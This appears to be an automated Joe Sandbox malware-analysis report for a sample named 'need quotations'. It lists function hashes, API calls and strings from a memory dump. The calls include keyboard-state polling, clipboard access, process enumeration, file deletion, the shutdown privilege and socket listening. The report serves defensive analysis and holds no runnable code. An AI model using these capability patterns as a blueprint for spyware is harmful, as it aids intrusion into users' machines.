Opcode ID: 5d6ee7f91ece3624bd90fb1309fb68abd83e7d669e333289f484b13ae1a145e4
Instruction ID: df682216b6f8bd087d187d49fd52b749ff5ca6d364a06ed725b95079d03ced66
Opcode Fuzzy Hash: 5d6ee7f91ece3624bd90fb1309fb68abd83e7d669e333289f484b13ae1a145e4
Instruction Fuzzy Hash: A031043251061B6ADF10EFA1EC49EEEB7AC9F05324F140566E801E3190DBB0DEB5CEA4

Function 00247D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00247DBD

Strings

^, xrefs: 00247D96
], xrefs: 00247D9F
[:<:]], xrefs: 00247D1D
[:>:]], xrefs: 00247D37
Q\E, xrefs: 002486D6
\, xrefs: 00247E1D
\, xrefs: 002BF95B
[, xrefs: 00247E14
\b(?=\w), xrefs: 002BF85E
\, xrefs: 00247D89
\b(?<=\w), xrefs: 002BF877

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
API String ID: 2102423945-2023335898
Opcode ID: cabaee78120508b3b8699aa856b32dbc8812eb66a280d5ce57ce120930c8a276
Instruction ID: 549e3b6101ce760b090cbdbf942d6c292686015df468e6bbb3aea5406c5bbb43
Opcode Fuzzy Hash: cabaee78120508b3b8699aa856b32dbc8812eb66a280d5ce57ce120930c8a276
Instruction Fuzzy Hash: 2382C171D2421ACBCB28CF98C9807EDBBB1FF48354F258169D819AB251E7709DA5CB90

Function 00246F07 Relevance: 23.4, Strings: 18, Instructions: 883COMMON

Download Yara Rule

Strings

NO_START_OPT), xrefs: 002C2CD1
CR), xrefs: 002C2E09
CRLF), xrefs: 002C2E43
ANYCRLF), xrefs: 002C2E7D
BSR_UNICODE), xrefs: 002C2EBA
BSR_ANYCRLF), xrefs: 002C2EA0
NO_AUTO_POSSESS), xrefs: 002C2CB0
cs295eocs290eocs290eocs290eocs290eocs29ceocs297eocs294eocs295eocs29aeocs29ceocs294eocs294eocs290eocs290eocs290eocs290eocs290eocs29, xrefs: 00246FD1
... ., xrefs: 00247096, 0024709C
LF), xrefs: 002C2E26
LIMIT_MATCH=, xrefs: 002C2CF2
ANY), xrefs: 002C2E60
., xrefs: 00246F77
UTF16), xrefs: 002C2C56
UTF), xrefs: 002C2C7C
UCP), xrefs: 002C2C8F
T./, xrefs: 002C2E57, 002C2F2A
LIMIT_RECURSION=, xrefs: 002C2D7E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID:
String ID: .$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$T./$UCP)$UTF)$UTF16)$cs295eocs290eocs290eocs290eocs290eocs29ceocs297eocs294eocs295eocs29aeocs29ceocs294eocs294eocs290eocs290eocs290eocs290eocs290eocs29$... .
API String ID: 0-4049906389
Opcode ID: c29d37150af0bce5aabd66ebbdd6d6a969b8e980e83c597e5d902a22b3000619
Instruction ID: 4021ea9553aabdf0717550e57fe4367f91267ebb0519690ebf673a1668892988
Opcode Fuzzy Hash: c29d37150af0bce5aabd66ebbdd6d6a969b8e980e83c597e5d902a22b3000619
Instruction Fuzzy Hash: E6726071E2421ADBDB18DF58C880BBEB7B5BF44310F14816AE919EB280DB709E55DF90

Function 0029091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 002909DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 002909EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002909FB
__wsplitpath.LIBCMT ref: 00290A59
_wcscat.LIBCMT ref: 00290A71
_wcscat.LIBCMT ref: 00290A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00290A98
SetCurrentDirectoryW.KERNEL32(?), ref: 00290AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 00290ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 00290AFF
_wcscpy.LIBCMT ref: 00290B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00290B4A

Strings

*.*, xrefs: 00290B05

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: f63b9df10ea8909719837a633e1a4b3fef4515e0c8b7cb0a3a7049312ad6ae1e
Instruction ID: 97bf01418150f033c35c70c8639b22cf05309cb749cd1ebd448f43989ede7122
Opcode Fuzzy Hash: f63b9df10ea8909719837a633e1a4b3fef4515e0c8b7cb0a3a7049312ad6ae1e
Instruction Fuzzy Hash: EA615A725243059FDB10EF60C88499EB3E8FF89714F04496AF989C7252DB31EA65CF92

Function 0027A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0027ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0027ABD7
Part of subcall function 0027ABBB: GetLastError.KERNEL32(?,0027A69F,?,?,?), ref: 0027ABE1
Part of subcall function 0027ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0027A69F,?,?,?), ref: 0027ABF0
Part of subcall function 0027ABBB: HeapAlloc.KERNEL32(00000000,?,0027A69F,?,?,?), ref: 0027ABF7
Part of subcall function 0027ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0027AC0E

Part of subcall function 0027AC56: GetProcessHeap.KERNEL32(00000008,0027A6B5,00000000,00000000,?,0027A6B5,?), ref: 0027AC62
Part of subcall function 0027AC56: HeapAlloc.KERNEL32(00000000,?,0027A6B5,?), ref: 0027AC69
Part of subcall function 0027AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0027A6B5,?), ref: 0027AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0027A6D0
_memset.LIBCMT ref: 0027A6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0027A704
GetLengthSid.ADVAPI32(?), ref: 0027A715
GetAce.ADVAPI32(?,00000000,?), ref: 0027A752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0027A76E
GetLengthSid.ADVAPI32(?), ref: 0027A78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0027A79A
HeapAlloc.KERNEL32(00000000), ref: 0027A7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0027A7C2
CopySid.ADVAPI32(00000000), ref: 0027A7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0027A7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0027A820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0027A834

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: f5b134b718eb8b0d18f5a37d4c50ef95497bb77863a44eef4f84dfa7b7de1a9c
Instruction ID: cd70b9051c86d087e086ed2c5b2f7a4fa81ea1c78c33c1561faba260574d33a8
Opcode Fuzzy Hash: f5b134b718eb8b0d18f5a37d4c50ef95497bb77863a44eef4f84dfa7b7de1a9c
Instruction Fuzzy Hash: BB516E7191020AAFDF04DF95DC49EEEBBB9FF44310F048129F919A7290D7349A15CB61

Function 002863F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00286EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00285FA6,?), ref: 00286ED8

Part of subcall function 002872CB: GetFileAttributesW.KERNEL32(?,00286019), ref: 002872CC

_wcscat.LIBCMT ref: 00286441
__wsplitpath.LIBCMT ref: 0028645F
FindFirstFileW.KERNEL32(?,?), ref: 00286474
_wcscpy.LIBCMT ref: 002864A3
_wcscat.LIBCMT ref: 002864B8
_wcscat.LIBCMT ref: 002864CA
DeleteFileW.KERNEL32(?), ref: 002864DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 002864EB
FindClose.KERNEL32(00000000), ref: 00286506

Strings

\*.*, xrefs: 0028643B

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: 0be313519a1ba99d48ad1fe50431d91cf0873bcb3eb0cda48bfdfccae5e3831d
Instruction ID: d266ddc21cd8c0391c0bae64785ba47f6dbd62a040e887f06be11ea9c03982f9
Opcode Fuzzy Hash: 0be313519a1ba99d48ad1fe50431d91cf0873bcb3eb0cda48bfdfccae5e3831d
Instruction Fuzzy Hash: 5E31D4B24193849AC321EFA48888EDFB7DCAF55310F44092EF6D8C3181EA35D5598BA7

Function 002A31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 002A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002A2BB5,?,?), ref: 002A3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002A328E

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002A332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002A33C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 002A3604
RegCloseKey.ADVAPI32(00000000), ref: 002A3611

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 7bc3e184fd2588b4cb50ac2e12effb2d433b34ff244ebfffb3273e241bfa4a26
Instruction ID: 31aaf682d1bac1aea0a7ca5e1c8a385197034ff5134d00d11e99c03497a11d80
Opcode Fuzzy Hash: 7bc3e184fd2588b4cb50ac2e12effb2d433b34ff244ebfffb3273e241bfa4a26
Instruction Fuzzy Hash: B3E14A71614201AFCB14DF28C995E2ABBE8FF89710B14846DF94ADB2A1DB30ED15CF51

Function 00282B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00282B5F
GetAsyncKeyState.USER32(000000A0), ref: 00282BE0
GetKeyState.USER32(000000A0), ref: 00282BFB
GetAsyncKeyState.USER32(000000A1), ref: 00282C15
GetKeyState.USER32(000000A1), ref: 00282C2A
GetAsyncKeyState.USER32(00000011), ref: 00282C42
GetKeyState.USER32(00000011), ref: 00282C54
GetAsyncKeyState.USER32(00000012), ref: 00282C6C
GetKeyState.USER32(00000012), ref: 00282C7E
GetAsyncKeyState.USER32(0000005B), ref: 00282C96
GetKeyState.USER32(0000005B), ref: 00282CA8

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 95a05020c0b7b85194bf790c82e63476c637dcbf4fd1f72713bf4f2690850638
Instruction ID: bb0bd12fe072a61990994b3e9055561330ff15a4309ead15c712e855c3a94b5a
Opcode Fuzzy Hash: 95a05020c0b7b85194bf790c82e63476c637dcbf4fd1f72713bf4f2690850638
Instruction Fuzzy Hash: 5C41E9385167CBADFF30BF6089047B9BEA06F11348F44805ED5C6562C2DBA499ECC7A2

Function 00296D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00296D2E
EmptyClipboard.USER32 ref: 00296D34
GlobalAlloc.KERNEL32(00000002,?), ref: 00296D49
CloseClipboard.USER32 ref: 00296DE8

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: a47ab57651c2418ed662f9fcfd991e2b6db119a3d3028f451802ad430d5e5d4d
Instruction ID: 4511a902517d828d001c1c5c64b174c57737c8c514806e9ac8678525880b75b9
Opcode Fuzzy Hash: a47ab57651c2418ed662f9fcfd991e2b6db119a3d3028f451802ad430d5e5d4d
Instruction Fuzzy Hash: 63218B31320110AFDB11AF64EC4DF2D77E8EF44B11F14842AF94A9B2A1CB70E911CB65

Function 0029C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 00279ABF: CLSIDFromProgID.OLE32 ref: 00279ADC
Part of subcall function 00279ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00279AF7
Part of subcall function 00279ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00279B05
Part of subcall function 00279ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00279B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0029C235
_memset.LIBCMT ref: 0029C242
_memset.LIBCMT ref: 0029C360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0029C38C
CoTaskMemFree.OLE32(?), ref: 0029C397

Strings

NULL Pointer assignment, xrefs: 0029C3E5

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 519c35d397d142c1217b6117075c8132ae94dc791bb2c790776fae8b500bc219
Instruction ID: c2b9213d8e48df332720767b4d5577a6a0271a3f3a8dd48478f312e88e22e132
Opcode Fuzzy Hash: 519c35d397d142c1217b6117075c8132ae94dc791bb2c790776fae8b500bc219
Instruction Fuzzy Hash: A9915C71D10218ABDF10DF94DC85EEEBBB8EF04710F20816AF919A7291DB709A55CFA0

Function 00249B60 Relevance: 11.1, Strings: 8, Instructions: 1055COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00249ED4
VUUU, xrefs: 00249E95
VUUU, xrefs: 002CBE14
VUUU, xrefs: 00249EA7
ERCP, xrefs: 00249C32
T./, xrefs: 002CBD50
., xrefs: 00249CF3
cs295eocs290eocs290eocs290eocs290eocs29ceocs297eocs294eocs295eocs29aeocs29ceocs294eocs294eocs290eocs290eocs290eocs290eocs290eocs29, xrefs: 00249E48, 00249E53

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID:
String ID: ERCP$T./$VUUU$VUUU$VUUU$VUUU$cs295eocs290eocs290eocs290eocs290eocs29ceocs297eocs294eocs295eocs29aeocs29ceocs294eocs294eocs290eocs290eocs290eocs290eocs290eocs29$.
API String ID: 0-2722510373
Opcode ID: 195ceb9a6a73abdbe15c5c04437610ef27140718216bc44e6e700456fc84fa41
Instruction ID: 5f62625f24374ca082282541bc9d42c3e4d04ef23ab0c29a099dfc5ec43e5260
Opcode Fuzzy Hash: 195ceb9a6a73abdbe15c5c04437610ef27140718216bc44e6e700456fc84fa41
Instruction Fuzzy Hash: 8A92A471E2011ACBDF28CF58C841BAEB7B1BB54314F25829AD81AA7280D7719DE5CF91

Function 002879D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 0027B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0027B180
Part of subcall function 0027B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0027B1AD
Part of subcall function 0027B134: GetLastError.KERNEL32 ref: 0027B1BA

ExitWindowsEx.USER32(?,00000000), ref: 00287A0F

Strings

@, xrefs: 00287A02
, xrefs: 002879FD
SeShutdownPrivilege, xrefs: 002879DD

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 94df767bc9a6c3b8c6246f56262cdc029e9bd16ea5a22ac444bbb0a75b0078fb
Instruction ID: e06083c91df1be14826495b94987758cfaccf9ac8e4c6346f627fc09e370fe8d
Opcode Fuzzy Hash: 94df767bc9a6c3b8c6246f56262cdc029e9bd16ea5a22ac444bbb0a75b0078fb
Instruction Fuzzy Hash: CB01AC7967A2126AF72C7A64DC9AFBF72589B00740F344434FD43A20D2D5A1DE2083B4

Function 00298C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00298CA8
WSAGetLastError.WSOCK32(00000000), ref: 00298CB7
bind.WSOCK32(00000000,?,00000010), ref: 00298CD3
listen.WSOCK32(00000000,00000005), ref: 00298CE2
WSAGetLastError.WSOCK32(00000000), ref: 00298CFC
closesocket.WSOCK32(00000000,00000000), ref: 00298D10

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 6133ec84d318036a70921080b0df4b71f1720bee08c6d86fd8a225a33272d9d7
Instruction ID: 7c168c79f0f3393e4b9b10ece61bc14ac9e360d92672434a665b1fcfa363e559
Opcode Fuzzy Hash: 6133ec84d318036a70921080b0df4b71f1720bee08c6d86fd8a225a33272d9d7
Instruction Fuzzy Hash: E32121316102019FCB14EF28DC88F2EB7A8FF4A720F148169F916A73D2CB70AD158B61

Function 00286532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00286554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00286564
Process32NextW.KERNEL32(00000000,0000022C), ref: 00286583
__wsplitpath.LIBCMT ref: 002865A7
_wcscat.LIBCMT ref: 002865BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 002865F9

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 509b067ce8be33fbae20bdb7d180810699e60ede7f25df46ea5644a00930c033
Instruction ID: 8c28d21028696b0bc213c60bd2a2635d11683b05dbc655cb52d9f6278d1ae679
Opcode Fuzzy Hash: 509b067ce8be33fbae20bdb7d180810699e60ede7f25df46ea5644a00930c033
Instruction Fuzzy Hash: 7B217175911219AFDB10AFA4DC8CFEAB7BCAB44300F5000A5E505D7181DBB59B95CF60

Function 002813CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 002813DC

Strings

,2/, xrefs: 002816B1
|, xrefs: 0028140C
<2/, xrefs: 002816FA
(, xrefs: 00281422

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: lstrlen
String ID: ($,2/$<2/$|
API String ID: 1659193697-2989682679
Opcode ID: 0121d961d17014ef16da216893fc13dcd674ff0d5f0f0576c288d34b592c3493
Instruction ID: 5b055177bec05fd64038985706c24e387ebcc53aa3d054dd40eb8e18a5ff49c9
Opcode Fuzzy Hash: 0121d961d17014ef16da216893fc13dcd674ff0d5f0f0576c288d34b592c3493
Instruction Fuzzy Hash: E5323679A107059FC728DF29C48196AB7F4FF48310B11C46EE59ADB3A2E770E962CB44

Function 0029923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0029A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0029A84E

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00299296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 002992B9

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

